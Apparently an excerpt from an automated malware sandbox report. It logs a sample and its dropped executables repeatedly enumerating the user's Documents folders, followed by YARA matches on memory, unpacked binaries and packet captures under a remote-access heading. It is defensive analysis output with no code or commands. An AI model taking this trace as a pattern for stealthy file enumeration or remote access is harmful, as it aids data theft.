Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: number of queries: 1474
Source: Yara match File source: 0000000C.00000003.2836024588.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2871436723.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2798194667.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2209806548.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2895609812.0000000001A6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2839354396.0000000001A59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2895550351.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2797107426.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2822426933.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2797251445.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2797026872.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 4916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 5280, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000022.00000003.2989652207.000000000114F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: deecb7b612.exe PID: 5856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: deecb7b612.exe PID: 6976, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 4916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 31.2.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.2.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.0.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.b76bb5cee7.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.b76bb5cee7.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2721535335.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3018675741.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2766160676.0000000000AA1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3018412209.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.3003208783.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2961232929.0000000000AA1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2875184699.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2862123172.0000000005220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2967959553.000000000150B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2875355609.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.2854773209.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.2855075944.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.3003112537.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 5712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 6444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6456, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP